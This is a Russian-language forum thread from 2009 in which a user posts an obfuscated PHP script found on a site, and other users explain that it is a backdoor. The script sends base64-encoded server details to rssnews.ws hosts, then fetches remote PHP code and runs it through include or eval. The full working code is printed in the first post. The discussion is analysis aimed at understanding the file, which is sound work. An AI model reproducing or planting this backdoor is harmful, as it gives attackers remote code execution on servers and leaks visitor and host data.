Что он делает?

Тема в разделе "PHP", создана пользователем Denis5, 19 май 2009.

Статус темы:
Закрыта.
Модераторы: latteo
  1. Denis5

    Denis5 Постоялец

    Регистр.:
    2 сен 2008
    Сообщения:
    98
    Симпатии:
    23
    Нашёл на одном гсе в папке ксапа.

    PHP:
    <? error_reporting(0);

    $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
    $f=base64_decode("cnNzbmV3cy53cw==");
    if (
    basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="4434c89f7bbc81b7ce9623ae15229e46"$f=$_REQUEST["id"];
    if((include(
    base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
    else if(
    $c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
    else{
    $cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $o=curl_exec($cu);
    curl_close($cu);
    eval(
    $o);};
    die(); 
    ?>

     
  2. PapaJoe

    PapaJoe

    Регистр.:
    4 авг 2008
    Сообщения:
    620
    Симпатии:
    312
    скрипт либо инклюдит какой-то файл с http://ads.rssnews.ws/?DATA либо качает его и выполняет на серваке(т.е. там должен быть php-скрипт, т.к. выполнение происходит через ф-цию eval() )
    где DATA - это данные хоста
    PHP:
    $_SERVER["HTTP_HOST"]
    $_SERVER["SERVER_NAME"]
    $_SERVER["REQUEST_URI"]
    $_SERVER["PHP_SELF"]
    $_SERVER["QUERY_STRING"]
    $_SERVER["HTTP_REFERER"]
    $_SERVER["HTTP_USER_AGENT"]
    $_SERVER["REMOTE_ADDR"]
    $_SERVER["SCRIPT_FILENAME"]
    $_SERVER["HTTP_ACCEPT_LANGUAGE"]
    (закодированные в base64)
    на котором находится приведенный вами скрипт
     
  3. t0os

    t0os

    Регистр.:
    21 окт 2007
    Сообщения:
    284
    Симпатии:
    36
    Похоже на расставление линков для дора. Или сам дор, не расшифровывал.
     
  4. Denis5

    Denis5 Постоялец

    Регистр.:
    2 сен 2008
    Сообщения:
    98
    Симпатии:
    23
    ааа.. то есть получается к xapповским ссылкам подсовывает ещё и свои...
    не плохо придумали!!!

    а можно ли зная имя этой папки в которой текстовые файлы со ссылками ксапа залить туда этот php файл или он туда попал через какую-то другую дыру?


    Кстати чудесным образом после удаления этого файла лёг сервер. В саппорте стандартная отписка, мол техническа профилактика. :(

    Хорошо что это шеред и мне пофигу на него :)
     
  5. t0os

    t0os

    Регистр.:
    21 окт 2007
    Сообщения:
    284
    Симпатии:
    36
    Denis5, если можно, спали в личку урл плз, где нашел. Интересно стало.
     
  6. -c0d3r-

    -c0d3r- Создатель

    Регистр.:
    4 апр 2009
    Сообщения:
    10
    Симпатии:
    0
    Попытка проинклудить опр страницу в зависимости от некоторых параметров.
     
  7. lesorub

    lesorub Жаббервог

    Регистр.:
    22 дек 2008
    Сообщения:
    329
    Симпатии:
    282
    Вот что пишет этот сервер 71.rssnews.ws
    Регистрация по инвайтам

    В нете полно ссылок на этот бэкдор
     
Статус темы:
Закрыта.